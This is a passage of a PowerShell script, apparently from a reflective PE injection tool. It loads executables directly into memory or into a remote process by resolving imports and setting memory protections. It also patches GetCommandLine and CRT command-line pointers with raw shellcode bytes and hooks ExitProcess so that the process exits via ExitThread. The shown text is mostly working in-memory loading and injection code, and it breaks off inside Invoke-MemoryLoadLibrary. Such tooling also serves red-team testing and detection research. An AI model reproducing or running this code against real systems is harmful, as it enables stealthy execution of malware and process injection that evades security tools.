1567.                 elseif ($RelocType -ne $Win32Constants.IMAGE_REL_BASED_ABSOLUTE)
1568.                 {
1569.  
1570.                     Throw "Unknown relocation found, relocation value: $RelocType, relocationinfo: $RelocationInfo"
1571.                 }
1572.             }
1573.  
1574.             $BaseRelocPtr = [IntPtr](Add-SignedIntAsUnsigned ([Int64]$BaseRelocPtr) ([Int64]$BaseRelocationTable.SizeOfBlock))
1575.         }
1576.     }
1577.  
1578.  
1579.     Function Import-DllImports
1580.     {
1581.         Param(
1582.         [Parameter(Position = 0, Mandatory = $true)]
1583.         [System.Object]
1584.         $PEInfo,
1585.  
1586.         [Parameter(Position = 1, Mandatory = $true)]
1587.         [System.Object]
1588.         $Win32Functions,
1589.  
1590.         [Parameter(Position = 2, Mandatory = $true)]
1591.         [System.Object]
1592.         $Win32Types,
1593.  
1594.         [Parameter(Position = 3, Mandatory = $true)]
1595.         [System.Object]
1596.         $Win32Constants,
1597.  
1598.         [Parameter(Position = 4, Mandatory = $false)]
1599.         [IntPtr]
1600.         $RemoteProcHandle
1601.         )
1602.  
1603.         $RemoteLoading = $false
1604.         if ($PEInfo.PEHandle -ne $PEInfo.EffectivePEHandle)
1605.         {
1606.             $RemoteLoading = $true
1607.         }
1608.  
1609.         if ($PEInfo.IMAGE_NT_HEADERS.OptionalHeader.ImportTable.Size -gt 0)
1610.         {
1611.             [IntPtr]$ImportDescriptorPtr = Add-SignedIntAsUnsigned ([Int64]$PEInfo.PEHandle) ([Int64]$PEInfo.IMAGE_NT_HEADERS.OptionalHeader.ImportTable.VirtualAddress)
1612.  
1613.             while ($true)
1614.             {
1615.                 $ImportDescriptor = [System.Runtime.InteropServices.Marshal]::PtrToStructure($ImportDescriptorPtr, [Type]$Win32Types.IMAGE_IMPORT_DESCRIPTOR)
1616.  
1617.  
1618.                 if ($ImportDescriptor.Characteristics -eq 0 `
1619.                         -and $ImportDescriptor.FirstThunk -eq 0 `
1620.                         -and $ImportDescriptor.ForwarderChain -eq 0 `
1621.                         -and $ImportDescriptor.Name -eq 0 `
1622.                         -and $ImportDescriptor.TimeDateStamp -eq 0)
1623.                 {
1624.                     Write-Verbose "Done importing DLL imports"
1625.                     break
1626.                 }
1627.  
1628.                 $ImportDllHandle = [IntPtr]::Zero
1629.                 $ImportDllPathPtr = (Add-SignedIntAsUnsigned ([Int64]$PEInfo.PEHandle) ([Int64]$ImportDescriptor.Name))
1630.                 $ImportDllPath = [System.Runtime.InteropServices.Marshal]::PtrToStringAnsi($ImportDllPathPtr)
1631.  
1632.                 if ($RemoteLoading -eq $true)
1633.                 {
1634.                     $ImportDllHandle = Import-DllInRemoteProcess -RemoteProcHandle $RemoteProcHandle -ImportDllPathPtr $ImportDllPathPtr
1635.                 }
1636.                 else
1637.                 {
1638.                     $ImportDllHandle = $Win32Functions.LoadLibrary.Invoke($ImportDllPath)
1639.                 }
1640.  
1641.                 if (($ImportDllHandle -eq $null) -or ($ImportDllHandle -eq [IntPtr]::Zero))
1642.                 {
1643.                     throw "Error importing DLL, DLLName: $ImportDllPath"
1644.                 }
1645.  
1646.  
1647.                 [IntPtr]$ThunkRef = Add-SignedIntAsUnsigned ($PEInfo.PEHandle) ($ImportDescriptor.FirstThunk)
1648.                 [IntPtr]$OriginalThunkRef = Add-SignedIntAsUnsigned ($PEInfo.PEHandle) ($ImportDescriptor.Characteristics)
1649.                 [IntPtr]$OriginalThunkRefVal = [System.Runtime.InteropServices.Marshal]::PtrToStructure($OriginalThunkRef, [Type][IntPtr])
1650.  
1651.                 while ($OriginalThunkRefVal -ne [IntPtr]::Zero)
1652.                 {
1653.                     $LoadByOrdinal = $false
1654.                     [IntPtr]$ProcedureNamePtr = [IntPtr]::Zero
1655.  
1656.  
1657.  
1658.                     [IntPtr]$NewThunkRef = [IntPtr]::Zero
1659.                     if([System.Runtime.InteropServices.Marshal]::SizeOf([Type][IntPtr]) -eq 4 -and [Int32]$OriginalThunkRefVal -lt 0)
1660.                     {
1661.                         [IntPtr]$ProcedureNamePtr = [IntPtr]$OriginalThunkRefVal -band 0xffff
1662.                         $LoadByOrdinal = $true
1663.                     }
1664.                     elseif([System.Runtime.InteropServices.Marshal]::SizeOf([Type][IntPtr]) -eq 8 -and [Int64]$OriginalThunkRefVal -lt 0)
1665.                     {
1666.                         [IntPtr]$ProcedureNamePtr = [Int64]$OriginalThunkRefVal -band 0xffff
1667.                         $LoadByOrdinal = $true
1668.                     }
1669.                     else
1670.                     {
1671.                         [IntPtr]$StringAddr = Add-SignedIntAsUnsigned ($PEInfo.PEHandle) ($OriginalThunkRefVal)
1672.                         $StringAddr = Add-SignedIntAsUnsigned $StringAddr ([System.Runtime.InteropServices.Marshal]::SizeOf([Type][UInt16]))
1673.                         $ProcedureName = [System.Runtime.InteropServices.Marshal]::PtrToStringAnsi($StringAddr)
1674.                         $ProcedureNamePtr = [System.Runtime.InteropServices.Marshal]::StringToHGlobalAnsi($ProcedureName)
1675.                     }
1676.  
1677.                     if ($RemoteLoading -eq $true)
1678.                     {
1679.                         [IntPtr]$NewThunkRef = Get-RemoteProcAddress -RemoteProcHandle $RemoteProcHandle -RemoteDllHandle $ImportDllHandle -FunctionNamePtr $ProcedureNamePtr -LoadByOrdinal $LoadByOrdinal
1680.                     }
1681.                     else
1682.                     {
1683.                         [IntPtr]$NewThunkRef = $Win32Functions.GetProcAddressIntPtr.Invoke($ImportDllHandle, $ProcedureNamePtr)
1684.                     }
1685.  
1686.                     if ($NewThunkRef -eq $null -or $NewThunkRef -eq [IntPtr]::Zero)
1687.                     {
1688.                         if ($LoadByOrdinal)
1689.                         {
1690.                             Throw "New function reference is null, this is almost certainly a bug in this script. Function Ordinal: $ProcedureNamePtr. Dll: $ImportDllPath"
1691.                         }
1692.                         else
1693.                         {
1694.                             Throw "New function reference is null, this is almost certainly a bug in this script. Function: $ProcedureName. Dll: $ImportDllPath"
1695.                         }
1696.                     }
1697.  
1698.                     [System.Runtime.InteropServices.Marshal]::StructureToPtr($NewThunkRef, $ThunkRef, $false)
1699.  
1700.                     $ThunkRef = Add-SignedIntAsUnsigned ([Int64]$ThunkRef) ([System.Runtime.InteropServices.Marshal]::SizeOf([Type][IntPtr]))
1701.                     [IntPtr]$OriginalThunkRef = Add-SignedIntAsUnsigned ([Int64]$OriginalThunkRef) ([System.Runtime.InteropServices.Marshal]::SizeOf([Type][IntPtr]))
1702.                     [IntPtr]$OriginalThunkRefVal = [System.Runtime.InteropServices.Marshal]::PtrToStructure($OriginalThunkRef, [Type][IntPtr])
1703.  
1704.  
1705.  
1706.                     if ((-not $LoadByOrdinal) -and ($ProcedureNamePtr -ne [IntPtr]::Zero))
1707.                     {
1708.                         [System.Runtime.InteropServices.Marshal]::FreeHGlobal($ProcedureNamePtr)
1709.                         $ProcedureNamePtr = [IntPtr]::Zero
1710.                     }
1711.                 }
1712.  
1713.                 $ImportDescriptorPtr = Add-SignedIntAsUnsigned ($ImportDescriptorPtr) ([System.Runtime.InteropServices.Marshal]::SizeOf([Type]$Win32Types.IMAGE_IMPORT_DESCRIPTOR))
1714.             }
1715.         }
1716.     }
1717.  
1718.     Function Get-VirtualProtectValue
1719.     {
1720.         Param(
1721.         [Parameter(Position = 0, Mandatory = $true)]
1722.         [UInt32]
1723.         $SectionCharacteristics
1724.         )
1725.  
1726.         $ProtectionFlag = 0x0
1727.         if (($SectionCharacteristics -band $Win32Constants.IMAGE_SCN_MEM_EXECUTE) -gt 0)
1728.         {
1729.             if (($SectionCharacteristics -band $Win32Constants.IMAGE_SCN_MEM_READ) -gt 0)
1730.             {
1731.                 if (($SectionCharacteristics -band $Win32Constants.IMAGE_SCN_MEM_WRITE) -gt 0)
1732.                 {
1733.                     $ProtectionFlag = $Win32Constants.PAGE_EXECUTE_READWRITE
1734.                 }
1735.                 else
1736.                 {
1737.                     $ProtectionFlag = $Win32Constants.PAGE_EXECUTE_READ
1738.                 }
1739.             }
1740.             else
1741.             {
1742.                 if (($SectionCharacteristics -band $Win32Constants.IMAGE_SCN_MEM_WRITE) -gt 0)
1743.                 {
1744.                     $ProtectionFlag = $Win32Constants.PAGE_EXECUTE_WRITECOPY
1745.                 }
1746.                 else
1747.                 {
1748.                     $ProtectionFlag = $Win32Constants.PAGE_EXECUTE
1749.                 }
1750.             }
1751.         }
1752.         else
1753.         {
1754.             if (($SectionCharacteristics -band $Win32Constants.IMAGE_SCN_MEM_READ) -gt 0)
1755.             {
1756.                 if (($SectionCharacteristics -band $Win32Constants.IMAGE_SCN_MEM_WRITE) -gt 0)
1757.                 {
1758.                     $ProtectionFlag = $Win32Constants.PAGE_READWRITE
1759.                 }
1760.                 else
1761.                 {
1762.                     $ProtectionFlag = $Win32Constants.PAGE_READONLY
1763.                 }
1764.             }
1765.             else
1766.             {
1767.                 if (($SectionCharacteristics -band $Win32Constants.IMAGE_SCN_MEM_WRITE) -gt 0)
1768.                 {
1769.                     $ProtectionFlag = $Win32Constants.PAGE_WRITECOPY
1770.                 }
1771.                 else
1772.                 {
1773.                     $ProtectionFlag = $Win32Constants.PAGE_NOACCESS
1774.                 }
1775.             }
1776.         }
1777.  
1778.         if (($SectionCharacteristics -band $Win32Constants.IMAGE_SCN_MEM_NOT_CACHED) -gt 0)
1779.         {
1780.             $ProtectionFlag = $ProtectionFlag -bor $Win32Constants.PAGE_NOCACHE
1781.         }
1782.  
1783.         return $ProtectionFlag
1784.     }
1785.  
1786.     Function Update-MemoryProtectionFlags
1787.     {
1788.         Param(
1789.         [Parameter(Position = 0, Mandatory = $true)]
1790.         [System.Object]
1791.         $PEInfo,
1792.  
1793.         [Parameter(Position = 1, Mandatory = $true)]
1794.         [System.Object]
1795.         $Win32Functions,
1796.  
1797.         [Parameter(Position = 2, Mandatory = $true)]
1798.         [System.Object]
1799.         $Win32Constants,
1800.  
1801.         [Parameter(Position = 3, Mandatory = $true)]
1802.         [System.Object]
1803.         $Win32Types
1804.         )
1805.  
1806.         for( $i = 0; $i -lt $PEInfo.IMAGE_NT_HEADERS.FileHeader.NumberOfSections; $i++)
1807.         {
1808.             [IntPtr]$SectionHeaderPtr = [IntPtr](Add-SignedIntAsUnsigned ([Int64]$PEInfo.SectionHeaderPtr) ($i * [System.Runtime.InteropServices.Marshal]::SizeOf([Type]$Win32Types.IMAGE_SECTION_HEADER)))
1809.             $SectionHeader = [System.Runtime.InteropServices.Marshal]::PtrToStructure($SectionHeaderPtr, [Type]$Win32Types.IMAGE_SECTION_HEADER)
1810.             [IntPtr]$SectionPtr = Add-SignedIntAsUnsigned ($PEInfo.PEHandle) ($SectionHeader.VirtualAddress)
1811.  
1812.             [UInt32]$ProtectFlag = Get-VirtualProtectValue $SectionHeader.Characteristics
1813.             [UInt32]$SectionSize = $SectionHeader.VirtualSize
1814.  
1815.             [UInt32]$OldProtectFlag = 0
1816.             Test-MemoryRangeValid -DebugString "Update-MemoryProtectionFlags::VirtualProtect" -PEInfo $PEInfo -StartAddress $SectionPtr -Size $SectionSize | Out-Null
1817.             $Success = $Win32Functions.VirtualProtect.Invoke($SectionPtr, $SectionSize, $ProtectFlag, [Ref]$OldProtectFlag)
1818.             if ($Success -eq $false)
1819.             {
1820.                 Throw "Unable to change memory protection"
1821.             }
1822.         }
1823.     }
1824.  
1825.  
1826.  
1827.     Function Update-ExeFunctions
1828.     {
1829.         Param(
1830.         [Parameter(Position = 0, Mandatory = $true)]
1831.         [System.Object]
1832.         $PEInfo,
1833.  
1834.         [Parameter(Position = 1, Mandatory = $true)]
1835.         [System.Object]
1836.         $Win32Functions,
1837.  
1838.         [Parameter(Position = 2, Mandatory = $true)]
1839.         [System.Object]
1840.         $Win32Constants,
1841.  
1842.         [Parameter(Position = 3, Mandatory = $true)]
1843.         [String]
1844.         $ExeArguments,
1845.  
1846.         [Parameter(Position = 4, Mandatory = $true)]
1847.         [IntPtr]
1848.         $ExeDoneBytePtr
1849.         )
1850.  
1851.  
1852.         $ReturnArray = @()
1853.  
1854.         $PtrSize = [System.Runtime.InteropServices.Marshal]::SizeOf([Type][IntPtr])
1855.         [UInt32]$OldProtectFlag = 0
1856.  
1857.         [IntPtr]$Kernel32Handle = $Win32Functions.GetModuleHandle.Invoke("Kernel32.dll")
1858.         if ($Kernel32Handle -eq [IntPtr]::Zero)
1859.         {
1860.             throw "Kernel32 handle null"
1861.         }
1862.  
1863.         [IntPtr]$KernelBaseHandle = $Win32Functions.GetModuleHandle.Invoke("KernelBase.dll")
1864.         if ($KernelBaseHandle -eq [IntPtr]::Zero)
1865.         {
1866.             throw "KernelBase handle null"
1867.         }
1868.  
1869.  
1870.  
1871.  
1872.         $CmdLineWArgsPtr = [System.Runtime.InteropServices.Marshal]::StringToHGlobalUni($ExeArguments)
1873.         $CmdLineAArgsPtr = [System.Runtime.InteropServices.Marshal]::StringToHGlobalAnsi($ExeArguments)
1874.  
1875.         [IntPtr]$GetCommandLineAAddr = $Win32Functions.GetProcAddress.Invoke($KernelBaseHandle, "GetCommandLineA")
1876.         [IntPtr]$GetCommandLineWAddr = $Win32Functions.GetProcAddress.Invoke($KernelBaseHandle, "GetCommandLineW")
1877.  
1878.         if ($GetCommandLineAAddr -eq [IntPtr]::Zero -or $GetCommandLineWAddr -eq [IntPtr]::Zero)
1879.         {
1880.             throw "GetCommandLine ptr null. GetCommandLineA: $(Get-Hex $GetCommandLineAAddr). GetCommandLineW: $(Get-Hex $GetCommandLineWAddr)"
1881.         }
1882.  
1883.  
1884.         [Byte[]]$Shellcode1 = @()
1885.         if ($PtrSize -eq 8)
1886.         {
1887.             $Shellcode1 += 0x48
1888.         }
1889.         $Shellcode1 += 0xb8
1890.  
1891.         [Byte[]]$Shellcode2 = @(0xc3)
1892.         $TotalSize = $Shellcode1.Length + $PtrSize + $Shellcode2.Length
1893.  
1894.  
1895.  
1896.         $GetCommandLineAOrigBytesPtr = [System.Runtime.InteropServices.Marshal]::AllocHGlobal($TotalSize)
1897.         $GetCommandLineWOrigBytesPtr = [System.Runtime.InteropServices.Marshal]::AllocHGlobal($TotalSize)
1898.         $Win32Functions.memcpy.Invoke($GetCommandLineAOrigBytesPtr, $GetCommandLineAAddr, [UInt64]$TotalSize) | Out-Null
1899.         $Win32Functions.memcpy.Invoke($GetCommandLineWOrigBytesPtr, $GetCommandLineWAddr, [UInt64]$TotalSize) | Out-Null
1900.         $ReturnArray += ,($GetCommandLineAAddr, $GetCommandLineAOrigBytesPtr, $TotalSize)
1901.         $ReturnArray += ,($GetCommandLineWAddr, $GetCommandLineWOrigBytesPtr, $TotalSize)
1902.  
1903.  
1904.         [UInt32]$OldProtectFlag = 0
1905.         $Success = $Win32Functions.VirtualProtect.Invoke($GetCommandLineAAddr, [UInt32]$TotalSize, [UInt32]($Win32Constants.PAGE_EXECUTE_READWRITE), [Ref]$OldProtectFlag)
1906.         if ($Success = $false)
1907.         {
1908.             throw "Call to VirtualProtect failed"
1909.         }
1910.  
1911.         $GetCommandLineAAddrTemp = $GetCommandLineAAddr
1912.         Write-BytesToMemory -Bytes $Shellcode1 -MemoryAddress $GetCommandLineAAddrTemp
1913.         $GetCommandLineAAddrTemp = Add-SignedIntAsUnsigned $GetCommandLineAAddrTemp ($Shellcode1.Length)
1914.         [System.Runtime.InteropServices.Marshal]::StructureToPtr($CmdLineAArgsPtr, $GetCommandLineAAddrTemp, $false)
1915.         $GetCommandLineAAddrTemp = Add-SignedIntAsUnsigned $GetCommandLineAAddrTemp $PtrSize
1916.         Write-BytesToMemory -Bytes $Shellcode2 -MemoryAddress $GetCommandLineAAddrTemp
1917.  
1918.         $Win32Functions.VirtualProtect.Invoke($GetCommandLineAAddr, [UInt32]$TotalSize, [UInt32]$OldProtectFlag, [Ref]$OldProtectFlag) | Out-Null
1919.  
1920.  
1921.  
1922.         [UInt32]$OldProtectFlag = 0
1923.         $Success = $Win32Functions.VirtualProtect.Invoke($GetCommandLineWAddr, [UInt32]$TotalSize, [UInt32]($Win32Constants.PAGE_EXECUTE_READWRITE), [Ref]$OldProtectFlag)
1924.         if ($Success = $false)
1925.         {
1926.             throw "Call to VirtualProtect failed"
1927.         }
1928.  
1929.         $GetCommandLineWAddrTemp = $GetCommandLineWAddr
1930.         Write-BytesToMemory -Bytes $Shellcode1 -MemoryAddress $GetCommandLineWAddrTemp
1931.         $GetCommandLineWAddrTemp = Add-SignedIntAsUnsigned $GetCommandLineWAddrTemp ($Shellcode1.Length)
1932.         [System.Runtime.InteropServices.Marshal]::StructureToPtr($CmdLineWArgsPtr, $GetCommandLineWAddrTemp, $false)
1933.         $GetCommandLineWAddrTemp = Add-SignedIntAsUnsigned $GetCommandLineWAddrTemp $PtrSize
1934.         Write-BytesToMemory -Bytes $Shellcode2 -MemoryAddress $GetCommandLineWAddrTemp
1935.  
1936.         $Win32Functions.VirtualProtect.Invoke($GetCommandLineWAddr, [UInt32]$TotalSize, [UInt32]$OldProtectFlag, [Ref]$OldProtectFlag) | Out-Null
1937.  
1938.  
1939.  
1940.  
1941.  
1942.  
1943.  
1944.  
1945.         $DllList = @("msvcr70d.dll", "msvcr71d.dll", "msvcr80d.dll", "msvcr90d.dll", "msvcr100d.dll", "msvcr110d.dll", "msvcr70.dll" `
1946.             , "msvcr71.dll", "msvcr80.dll", "msvcr90.dll", "msvcr100.dll", "msvcr110.dll")
1947.  
1948.         foreach ($Dll in $DllList)
1949.         {
1950.             [IntPtr]$DllHandle = $Win32Functions.GetModuleHandle.Invoke($Dll)
1951.             if ($DllHandle -ne [IntPtr]::Zero)
1952.             {
1953.                 [IntPtr]$WCmdLnAddr = $Win32Functions.GetProcAddress.Invoke($DllHandle, "_wcmdln")
1954.                 [IntPtr]$ACmdLnAddr = $Win32Functions.GetProcAddress.Invoke($DllHandle, "_acmdln")
1955.                 if ($WCmdLnAddr -eq [IntPtr]::Zero -or $ACmdLnAddr -eq [IntPtr]::Zero)
1956.                 {
1957.                     "Error, couldn't find _wcmdln or _acmdln"
1958.                 }
1959.  
1960.                 $NewACmdLnPtr = [System.Runtime.InteropServices.Marshal]::StringToHGlobalAnsi($ExeArguments)
1961.                 $NewWCmdLnPtr = [System.Runtime.InteropServices.Marshal]::StringToHGlobalUni($ExeArguments)
1962.  
1963.  
1964.                 $OrigACmdLnPtr = [System.Runtime.InteropServices.Marshal]::PtrToStructure($ACmdLnAddr, [Type][IntPtr])
1965.                 $OrigWCmdLnPtr = [System.Runtime.InteropServices.Marshal]::PtrToStructure($WCmdLnAddr, [Type][IntPtr])
1966.                 $OrigACmdLnPtrStorage = [System.Runtime.InteropServices.Marshal]::AllocHGlobal($PtrSize)
1967.                 $OrigWCmdLnPtrStorage = [System.Runtime.InteropServices.Marshal]::AllocHGlobal($PtrSize)
1968.                 [System.Runtime.InteropServices.Marshal]::StructureToPtr($OrigACmdLnPtr, $OrigACmdLnPtrStorage, $false)
1969.                 [System.Runtime.InteropServices.Marshal]::StructureToPtr($OrigWCmdLnPtr, $OrigWCmdLnPtrStorage, $false)
1970.                 $ReturnArray += ,($ACmdLnAddr, $OrigACmdLnPtrStorage, $PtrSize)
1971.                 $ReturnArray += ,($WCmdLnAddr, $OrigWCmdLnPtrStorage, $PtrSize)
1972.  
1973.                 $Success = $Win32Functions.VirtualProtect.Invoke($ACmdLnAddr, [UInt32]$PtrSize, [UInt32]($Win32Constants.PAGE_EXECUTE_READWRITE), [Ref]$OldProtectFlag)
1974.                 if ($Success = $false)
1975.                 {
1976.                     throw "Call to VirtualProtect failed"
1977.                 }
1978.                 [System.Runtime.InteropServices.Marshal]::StructureToPtr($NewACmdLnPtr, $ACmdLnAddr, $false)
1979.                 $Win32Functions.VirtualProtect.Invoke($ACmdLnAddr, [UInt32]$PtrSize, [UInt32]($OldProtectFlag), [Ref]$OldProtectFlag) | Out-Null
1980.  
1981.                 $Success = $Win32Functions.VirtualProtect.Invoke($WCmdLnAddr, [UInt32]$PtrSize, [UInt32]($Win32Constants.PAGE_EXECUTE_READWRITE), [Ref]$OldProtectFlag)
1982.                 if ($Success = $false)
1983.                 {
1984.                     throw "Call to VirtualProtect failed"
1985.                 }
1986.                 [System.Runtime.InteropServices.Marshal]::StructureToPtr($NewWCmdLnPtr, $WCmdLnAddr, $false)
1987.                 $Win32Functions.VirtualProtect.Invoke($WCmdLnAddr, [UInt32]$PtrSize, [UInt32]($OldProtectFlag), [Ref]$OldProtectFlag) | Out-Null
1988.             }
1989.         }
1990.  
1991.  
1992.  
1993.  
1994.  
1995.  
1996.         $ReturnArray = @()
1997.         $ExitFunctions = @()
1998.  
1999.  
2000.         [IntPtr]$MscoreeHandle = $Win32Functions.GetModuleHandle.Invoke("mscoree.dll")
2001.         if ($MscoreeHandle -eq [IntPtr]::Zero)
2002.         {
2003.             throw "mscoree handle null"
2004.         }
2005.         [IntPtr]$CorExitProcessAddr = $Win32Functions.GetProcAddress.Invoke($MscoreeHandle, "CorExitProcess")
2006.         if ($CorExitProcessAddr -eq [IntPtr]::Zero)
2007.         {
2008.             Throw "CorExitProcess address not found"
2009.         }
2010.         $ExitFunctions += $CorExitProcessAddr
2011.  
2012.  
2013.         [IntPtr]$ExitProcessAddr = $Win32Functions.GetProcAddress.Invoke($Kernel32Handle, "ExitProcess")
2014.         if ($ExitProcessAddr -eq [IntPtr]::Zero)
2015.         {
2016.             Throw "ExitProcess address not found"
2017.         }
2018.         $ExitFunctions += $ExitProcessAddr
2019.  
2020.         [UInt32]$OldProtectFlag = 0
2021.         foreach ($ProcExitFunctionAddr in $ExitFunctions)
2022.         {
2023.             $ProcExitFunctionAddrTmp = $ProcExitFunctionAddr
2024.  
2025.  
2026.             [Byte[]]$Shellcode1 = @(0xbb)
2027.             [Byte[]]$Shellcode2 = @(0xc6, 0x03, 0x01, 0x83, 0xec, 0x20, 0x83, 0xe4, 0xc0, 0xbb)
2028.  
2029.             if ($PtrSize -eq 8)
2030.             {
2031.                 [Byte[]]$Shellcode1 = @(0x48, 0xbb)
2032.                 [Byte[]]$Shellcode2 = @(0xc6, 0x03, 0x01, 0x48, 0x83, 0xec, 0x20, 0x66, 0x83, 0xe4, 0xc0, 0x48, 0xbb)
2033.             }
2034.             [Byte[]]$Shellcode3 = @(0xff, 0xd3)
2035.             $TotalSize = $Shellcode1.Length + $PtrSize + $Shellcode2.Length + $PtrSize + $Shellcode3.Length
2036.  
2037.             [IntPtr]$ExitThreadAddr = $Win32Functions.GetProcAddress.Invoke($Kernel32Handle, "ExitThread")
2038.             if ($ExitThreadAddr -eq [IntPtr]::Zero)
2039.             {
2040.                 Throw "ExitThread address not found"
2041.             }
2042.  
2043.             $Success = $Win32Functions.VirtualProtect.Invoke($ProcExitFunctionAddr, [UInt32]$TotalSize, [UInt32]$Win32Constants.PAGE_EXECUTE_READWRITE, [Ref]$OldProtectFlag)
2044.             if ($Success -eq $false)
2045.             {
2046.                 Throw "Call to VirtualProtect failed"
2047.             }
2048.  
2049.  
2050.             $ExitProcessOrigBytesPtr = [System.Runtime.InteropServices.Marshal]::AllocHGlobal($TotalSize)
2051.             $Win32Functions.memcpy.Invoke($ExitProcessOrigBytesPtr, $ProcExitFunctionAddr, [UInt64]$TotalSize) | Out-Null
2052.             $ReturnArray += ,($ProcExitFunctionAddr, $ExitProcessOrigBytesPtr, $TotalSize)
2053.  
2054.  
2055.  
2056.             Write-BytesToMemory -Bytes $Shellcode1 -MemoryAddress $ProcExitFunctionAddrTmp
2057.             $ProcExitFunctionAddrTmp = Add-SignedIntAsUnsigned $ProcExitFunctionAddrTmp ($Shellcode1.Length)
2058.             [System.Runtime.InteropServices.Marshal]::StructureToPtr($ExeDoneBytePtr, $ProcExitFunctionAddrTmp, $false)
2059.             $ProcExitFunctionAddrTmp = Add-SignedIntAsUnsigned $ProcExitFunctionAddrTmp $PtrSize
2060.             Write-BytesToMemory -Bytes $Shellcode2 -MemoryAddress $ProcExitFunctionAddrTmp
2061.             $ProcExitFunctionAddrTmp = Add-SignedIntAsUnsigned $ProcExitFunctionAddrTmp ($Shellcode2.Length)
2062.             [System.Runtime.InteropServices.Marshal]::StructureToPtr($ExitThreadAddr, $ProcExitFunctionAddrTmp, $false)
2063.             $ProcExitFunctionAddrTmp = Add-SignedIntAsUnsigned $ProcExitFunctionAddrTmp $PtrSize
2064.             Write-BytesToMemory -Bytes $Shellcode3 -MemoryAddress $ProcExitFunctionAddrTmp
2065.  
2066.             $Win32Functions.VirtualProtect.Invoke($ProcExitFunctionAddr, [UInt32]$TotalSize, [UInt32]$OldProtectFlag, [Ref]$OldProtectFlag) | Out-Null
2067.         }
2068.  
2069.  
2070.         Write-Output $ReturnArray
2071.     }
2072.  
2073.  
2074.  
2075.  
2076.     Function Copy-ArrayOfMemAddresses
2077.     {
2078.         Param(
2079.         [Parameter(Position = 0, Mandatory = $true)]
2080.         [Array[]]
2081.         $CopyInfo,
2082.  
2083.         [Parameter(Position = 1, Mandatory = $true)]
2084.         [System.Object]
2085.         $Win32Functions,
2086.  
2087.         [Parameter(Position = 2, Mandatory = $true)]
2088.         [System.Object]
2089.         $Win32Constants
2090.         )
2091.  
2092.         [UInt32]$OldProtectFlag = 0
2093.         foreach ($Info in $CopyInfo)
2094.         {
2095.             $Success = $Win32Functions.VirtualProtect.Invoke($Info[0], [UInt32]$Info[2], [UInt32]$Win32Constants.PAGE_EXECUTE_READWRITE, [Ref]$OldProtectFlag)
2096.             if ($Success -eq $false)
2097.             {
2098.                 Throw "Call to VirtualProtect failed"
2099.             }
2100.  
2101.             $Win32Functions.memcpy.Invoke($Info[0], $Info[1], [UInt64]$Info[2]) | Out-Null
2102.  
2103.             $Win32Functions.VirtualProtect.Invoke($Info[0], [UInt32]$Info[2], [UInt32]$OldProtectFlag, [Ref]$OldProtectFlag) | Out-Null
2104.         }
2105.     }
2106.  
2107.  
2108.  
2109.  
2110.  
2111.     Function Get-MemoryProcAddress
2112.     {
2113.         Param(
2114.         [Parameter(Position = 0, Mandatory = $true)]
2115.         [IntPtr]
2116.         $PEHandle,
2117.  
2118.         [Parameter(Position = 1, Mandatory = $true)]
2119.         [String]
2120.         $FunctionName
2121.         )
2122.  
2123.         $Win32Types = Get-Win32Types
2124.         $Win32Constants = Get-Win32Constants
2125.         $PEInfo = Get-PEDetailedInfo -PEHandle $PEHandle -Win32Types $Win32Types -Win32Constants $Win32Constants
2126.  
2127.  
2128.         if ($PEInfo.IMAGE_NT_HEADERS.OptionalHeader.ExportTable.Size -eq 0)
2129.         {
2130.             return [IntPtr]::Zero
2131.         }
2132.         $ExportTablePtr = Add-SignedIntAsUnsigned ($PEHandle) ($PEInfo.IMAGE_NT_HEADERS.OptionalHeader.ExportTable.VirtualAddress)
2133.         $ExportTable = [System.Runtime.InteropServices.Marshal]::PtrToStructure($ExportTablePtr, [Type]$Win32Types.IMAGE_EXPORT_DIRECTORY)
2134.  
2135.         for ($i = 0; $i -lt $ExportTable.NumberOfNames; $i++)
2136.         {
2137.  
2138.             $NameOffsetPtr = Add-SignedIntAsUnsigned ($PEHandle) ($ExportTable.AddressOfNames + ($i * [System.Runtime.InteropServices.Marshal]::SizeOf([Type][UInt32])))
2139.             $NamePtr = Add-SignedIntAsUnsigned ($PEHandle) ([System.Runtime.InteropServices.Marshal]::PtrToStructure($NameOffsetPtr, [Type][UInt32]))
2140.             $Name = [System.Runtime.InteropServices.Marshal]::PtrToStringAnsi($NamePtr)
2141.  
2142.             if ($Name -ceq $FunctionName)
2143.             {
2144.  
2145.  
2146.                 $OrdinalPtr = Add-SignedIntAsUnsigned ($PEHandle) ($ExportTable.AddressOfNameOrdinals + ($i * [System.Runtime.InteropServices.Marshal]::SizeOf([Type][UInt16])))
2147.                 $FuncIndex = [System.Runtime.InteropServices.Marshal]::PtrToStructure($OrdinalPtr, [Type][UInt16])
2148.                 $FuncOffsetAddr = Add-SignedIntAsUnsigned ($PEHandle) ($ExportTable.AddressOfFunctions + ($FuncIndex * [System.Runtime.InteropServices.Marshal]::SizeOf([Type][UInt32])))
2149.                 $FuncOffset = [System.Runtime.InteropServices.Marshal]::PtrToStructure($FuncOffsetAddr, [Type][UInt32])
2150.                 return Add-SignedIntAsUnsigned ($PEHandle) ($FuncOffset)
2151.             }
2152.         }
2153.  
2154.         return [IntPtr]::Zero
2155.     }
2156.  
2157.  
2158.     Function Invoke-MemoryLoadLibrary
2159.     {
2160.         Param(
2161.         [Parameter( Position = 0, Mandatory = $true )]
2162.         [Byte[]]
2163.         $PEBytes,
2164.  
2165.         [Parameter(Position = 1, Mandatory = $false)]
2166.         [String]
2167.         $ExeArgs,
2168.  
2169.         [Parameter(Position = 2, Mandatory = $false)]
2170.         [IntPtr]
2171.         $RemoteProcHandle,
2172.  
2173.         [Parameter(Position = 3)]
2174.         [Bool]
2175.         $ForceASLR = $false
2176.         )
2177.  
2178.         $PtrSize = [System.Runtime.InteropServices.Marshal]::SizeOf([Type][IntPtr])
2179.  
2180.  
2181.         $Win32Constants = Get-Win32Constants
2182.         $Win32Functions = Get-Win32Functions
2183.         $Win32Types = Get-Win32Types
2184.  
2185.         $RemoteLoading = $false
2186.         if (($RemoteProcHandle -ne $null) -and ($RemoteProcHandle -ne [IntPtr]::Zero))
2187.         {
2188.             $RemoteLoading = $true
2189.         }
2190.  
2191.  
2192.         Write-Verbose "Getting basic PE information from the file"
2193.         $PEInfo = Get-PEBasicInfo -PEBytes $PEBytes -Win32Types $Win32Types
2194.         $OriginalImageBase = $PEInfo.OriginalImageBase
2195.         $NXCompatible = $true
2196.         if (([Int] $PEInfo.DllCharacteristics -band $Win32Constants.IMAGE_DLLCHARACTERISTICS_NX_COMPAT) -ne $Win32Constants.IMAGE_DLLCHARACTERISTICS_NX_COMPAT)
2197.         {
2198.             Write-Warning "PE is not compatible with DEP, might cause issues" -WarningAction Continue
